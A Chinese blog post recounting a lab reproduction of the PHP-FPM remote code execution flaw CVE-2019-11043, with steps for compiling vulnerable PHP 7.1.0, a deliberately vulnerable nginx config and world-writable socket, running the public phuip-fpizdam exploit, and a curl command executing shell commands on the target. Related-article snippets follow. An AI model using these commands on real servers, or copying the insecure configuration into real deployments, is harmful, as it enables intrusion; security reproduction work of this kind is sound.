cve-2019-11043复现(靶机为Ubuntu18.04,php编译安装)

最新推荐文章于 2024-03-24 09:50:55 发布
最新推荐文章于 2024-03-24 09:50:55 发布
阅读量860 收藏
点赞数
分类专栏: exp复现与分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ckm1607011/article/details/104581475
版权

最近做的项目需要复现nginx的exp,其中就包括cve-2019-11043这个exp,他是一个远程代码执行的exp;

这个cve的来源:GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043 

我看了之后在Kali上把源码编译了,大家注意编译需要1.13以上版本的go,编译出来的可执行文件在linux平台上就都可以执行了;

让我感到头疼的是靶机要求的脆弱性配置:PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11

有一篇详细介绍如何复现此exp的文章(https://blog.simos.info/testing-cve-2019-11043-php-fpm-security-vulnerability-with-lxd-system-containers/),里面作者考虑到文章发布时可能已经下载不到所需版本,所以提供了低版本的php-fpm的deb包(http://security.ubuntu.com/ubuntu/pool/universe/p/php7.2/),但是,我在安装过程中一直无法解决依赖问题,那么只好自己编译低版本的php源码,好了,我们先来介绍php-7.1.0的编译安装(源码会放在百度云盘里,链接和提取码在后面提供)

将源码解压,进入文件夹,在编译之前我们先安装一些编译依赖库:

sudo -i
apt-get install gcc
apt-get install g++
apt-get install libxml2-dev
apt-get install libssl-dev
apt-get install libbz2-dev
apt-get install libjpeg-dev
apt install libpng-dev
apt install libmcrypt-dev
apt-get install curl

cd /usr/local/include
ln -s /usr/include/x86_64-linux-gnu/curl curl
apt-get install libcurl4-gnutls-dev

特别注意后三行,它完美地解决了编译时出现的configure: error: Please reinstall the libcurl distribution这个错误;

好了,下面可以放心编译了;

./configure --prefix=/usr/local/php  --enable-fpm --with-mcrypt --enable-mbstring --disable-pdo --with-curl --disable-debug  --disable-rpath --enable-inline-optimization --with-bz2  --with-zlib --enable-sockets --enable-sysvsem --enable-sysvshm --enable-pcntl --enable-mbregex --with-mhash --enable-zip --with-pcre-regex --with-mysqli --with-gd --with-jpeg-dir --with-openssl

make && make install

make test

make clean

建立软链接
ln -s /usr/local/php-$PHP_VERSION/bin/php /usr/bin/php
ln -s /usr/local/php-$PHP_VERSION/bin/phpize /usr/bin/phpize
ln -s /usr/local/php-$PHP_VERSION/bin/pecl /usr/bin/pecl
ln -s /usr/local/php-$PHP_VERSION/bin/php-config /usr/bin/php-config
ln -s /usr/local/php-$PHP_VERSION/sbin/php-fpm /usr/bin/php-fpm

添加用户与组
useradd nobody
groupadd nobody

设定配置文件
cd /usr/local/php/etc
cp php-fpm.conf.default php-fpm.conf

cd /usr/local/php/etc/php-fpm.d
cp www.conf.default www.conf

好了,让我们来测试一下安装成功了没有

cd /usr/local/php/sbin
./php-fpm -v

若打印出php-fpm的版本信息,就说明编译安装成功了;

接下来,我们要安装nginx,由于对nginx的版本无特别要求,所以直接命令行安装就行

apt-get install nginx

接下来,我们要进行php-fpm+nginx连接配置;

Part1:配置php-fpm

#添加用户与组
sudo -i
useradd nginx
usermod -G nginx nginx
#php与nginx的unix socket通信方式
cd /usr/local/php/var/run
touch php7.1-fpm.sock
chown nginx:nginx php7.1-fpm.sock
chmod 777 php7.1-fpm.sock

cd /usr/local/php/etc/php-fpm.d
gedit www.conf
#修改www.conf
gruop=nginx
user=nginx
listen=/usr/local/php/var/run/php7.1-fpm.sock
去掉listen.owner,listen.group,listen.mode前面的分号注释,修改:
listen.owner = nginx
listen.group = nginx
(listen.mode不用改)
#关闭www.conf

#看看改了配置后php-fpm是否还能运行
cd /usr/local/php/sbin
./php-fpm -v
#应该没有问题

Part2:配置nginx

gedit /etc/nginx/sites-enabled/default #修改default,将下列替换原来配置文件
--------------------------------------------------------------------------------------------------------------------------------
# See article at https://blog.simos.info/testing-cve-2019-11043-php-fpm-security-vulnerability-with-lxd-system-containers/
# Location: /etc/nginx/sites-enabled/default

server {
        listen 80 default_server;
        root /var/www/html;

        # Add index.php to the list if you are using PHP
        index index.html index.php;

        server_name _;

        location / {
            # First attempt to serve request as file, then
            # as directory, then fall back to displaying a 404.
            try_files $uri $uri/ =404;
        }

        # pass PHP scripts to FastCGI server
        #
        location ~ [^/].php(/|$) {

include fastcgi.conf;

# regex to split $uri to $fastcgi_script_name and $fastcgi_path
fastcgi_split_path_info ^(.+.php)(/.+)$;

# Check that the PHP script exists before passing it
#try_files $fastcgi_script_name =404;

# Bypass the fact that try_files resets $fastcgi_path_info
# see: http://trac.nginx.org/nginx/ticket/321
set $path_info $fastcgi_path_info;
fastcgi_param PATH_INFO $path_info;

fastcgi_index index.php;

            fastcgi_pass unix:/usr/local/php/var/run/php7.1-fpm.sock;
       }
}
--------------------------------------------------------------------------------------------------------------------------------

Part3:测试
上述配置完成后,重启

#依次启动php-fpm与nginx
sudo -i
cd /usr/local/php/sbin
./php-fpm
service nginx start
#给php7.1-fpm.sock赋权
#这里需要注意两点:1.必须在php-fpm与nginx启动之后再进行赋权,否则赋权无效;
#2.重启或关机之后再开机赋权会失效,需要重新赋权
cd /usr/local/php/var/run
chmod 777 php7.1-fpm.sock

echo "<?php echo '<p>hello World</p>';?>"|sudo tee /var/www/html/index.php
然后在浏览器输入http://localhost/,回车,若出现hello World则表示两者连接配置成功!

好了,台上三分钟,台下十年功,终于到了使用这个exp的时候了;

将靶机网络改为桥接网卡模式,用ifconfig打印出靶机的ip,用ufw disable关闭防火墙;

在另外一台linux系统上(例如我自己的是Ubuntu18.04)运行phuip-fpizdam这个可执行文件

先运行如下命令(exp检验配置是否脆弱)

./phuip-fpizdam http://<ip>/index.php

对于脆弱配置,会得到如下类似输出

确定配置脆弱后,可利用此exp对该网址进行远程代码执行;格式如下:

curl "http://<ip>/index.php?a=/bin/sh+-c+'which+which'&"

例如:

返回了id信息,与作者的例子一致,可以说,这个exp我复现成功了:)

注:此exp并非次次攻击有效,可多试几次!

php7.1.0的源码,链接: https://pan.baidu.com/s/1ntXNkElSFWTY9nj7BIAHEg  密码: q7qm

如果还有什么问题,可以查看nginx日志(路径:/var/log/nginx/error.log),也可以邮件联系我(KangMing_Chu@126.com)

ckm1607011
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-11043:Neex的(PoC)CVE-2019-11043 Python版本
03-08
PoC CVE-2019-11043 CVE-2019-11043漏洞利用的Python版本 此PoC仍然是草稿,请使用编写的漏洞利用漏洞分析: : PoC设定 只需运行docker compose即可启动nginx和php-fpm: # docker-compose up -d Creating network " cve-2019-11043-git_app_net " with driver " bridge " Creating php ... done Creating nginx ... done 如果您想阅读php-fpm日志,可以运行: docker logs --tail 10 --follow php 开发 # python3 exploit.py --url http://localhost/index.php [ * ] QSL candidate:
CVE-2019-11043PHP远程代码执行漏洞)
m0_51468027的博客
02-12 8748
一、漏洞描述   CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。   向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。   该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
探索Phuip-FPizdam:一个创新的密码学应用
最新发布
gitblog_00003的博客
03-24 362
探索Phuip-FPizdam:一个创新的密码学应用 项目地址:https://gitcode.com/neex/phuip-fpizdam 项目简介 在深入探讨之前,让我们先了解一下Phuip-FPizdam是什么。这是一个由开发者Neex创建的开源项目,它专注于提供一种安全、高效且新颖的加密算法,用于保护敏感数据和隐私。该项目的目标是为互联网上的信息交换提供更强大的安全保障。 技术分析 1....
CVE-2019-11043 PHP-FPM 复现和学习(环境CTFShow web311)
paidx0
08-09 462
CVE-2019-11043复现和学习 漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。 location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcg
PHP-FPM 远程代码执行漏洞(CVE-2019-11043复现
LRainner的博客
03-03 4307
PHP-FPM 远程代码执行漏洞(CVE-2019-11043复现 环境搭建 git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043 docker-compose up -d 访问 安装漏洞利用工具 git clone https://github.com/neex/phuip-fpizdam.git cd phuip-fpizdam go env -w GOPROXY=https://goproxy.c
CVE-2019-11043PHP远程代码执行漏洞)复现
永远是少年
12-11 1851
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043PHP远程代码执行漏洞)复现。 一、CVE-2019-11043PHP远程代码执行漏洞)简介 二、CVE-2019-11043PHP远程代码执行漏洞)漏洞环境搭建 三、CVE-2019-11043PHP远程代码执行漏洞)漏洞利用工具安装 四、CVE-2019-11043PHP远程代码执行漏洞)复现
CVE-2019-11043复现
hhiollk的博客
03-31 539
01 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 漏洞环境: 先把exp克隆到本地。 gitclonehttps://github.com/neex/phuip-fpizdam.git 安装go环境 wget -c h...
CVE-2019-11043漏洞复现-kali2020.4&win7
weixin_43867542的博客
07-19 815
漏洞名称:PHP 缓冲区错误漏洞 危害等级:中危 CVSS评分: 漏洞类型:缓冲区错误 漏洞概述: CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发。 受影响版本 PHP 7.0 版本;PHP 7.1 版本;PHP 7.2 版本;PHP 7.3 版本 环境概述
CVE-2019-11043 漏洞复现
m0_46580995的博客
07-19 1629
PHP-FPM 远程代码执行漏洞(CVE-2019-11043) 漏洞介绍 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 复现环境vnlhub 复现exp需要安装go语言环境 apt-get install golang -y 然后换个源(国内) go en
CVE2019-11043漏洞复现
daqiangdetianxia的博客
10-05 521
知其然,知其所以然。 原理:https://github.com/neex/phuip-fpizdam/blob/master/ZeroNights2019.pdf docker使用别人搭建好的环境 git clone https://github.com/vulhub/vulhub.git //git将vulhub下载到本地 cd vulhub/php/CVE-2019-11043 //进入CVE-2019-11043的目录 docker-compose up -d //下载.
Nginx PHP 远程代码执行漏洞复现(CVE-2019-11043)
谢公子的博客
10-24 1950
漏洞背景:来自Wallarm的安全研究员Andrew Danau在9月14-16号举办的Real World CTF中,意外的向服务器发送%0a(换行符)时,服务器返回异常信息。由此发现了这个0day漏洞 漏洞描述:当Nginx使用特定的 fastcgi 配置时,存在远程代码执行漏洞,但这个配置并非是Nginx的默认配置。只有当fastcgi_split_path_info 字段被配置为 ^(....
vulhub-php cve-2019-11043
ANYOUZHEN的博客
06-04 370
漏洞描述:Nginx上fastcgi_split_path_info在处理带有%0a的请求时,会因为遇到换行符\n导致PATH_INFO为空。而php-fpm在处理PATH_INFO为空的情况下,存在逻辑缺陷。攻击者通过精心构造和利用的PAYLOAD,可以导致远程代码执行。但Nginx使用的这个fastcgi配置,并非Nginx默认配置 受影响的版本:使用Nginx + php-fpm配置的服务器,并且在nginx/conf/nginx.confg配置文件中采用如下配置的时候,都会出现RCE漏洞 fas
PHP-FPM执行任意代码CVE-2019-11043
ranuy阮的博客
10-24 3474
0x00背景 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 0x01环境搭建 下载漏洞环境,使用docker搭建,漏洞环境地址https://gi...
PHP-fpm远程代码执行漏洞(CVE-2019-11043)
老北京砸酱锤的博客
06-22 952
漏洞介绍 Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。 Nginx+php-fpm的服务器,在使用如下配置的时候,可能存在远程代码执行漏洞。 漏洞复现 使用vulhub复现漏洞,进入CVE-2019-11043文件夹下(cd /home/apple/vulhub/ph
CVE-2019-11477 漏洞复现教程
05-27
我很抱歉,由于 CVE-2019-11477 是一种漏洞,攻击该漏洞可能导致远程服务器拒绝服务或崩溃,因此我无法提供该漏洞的复现教程或攻击代码。在任何情况下,攻击漏洞是违法行为,违反了信息安全法律法规,也会对网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值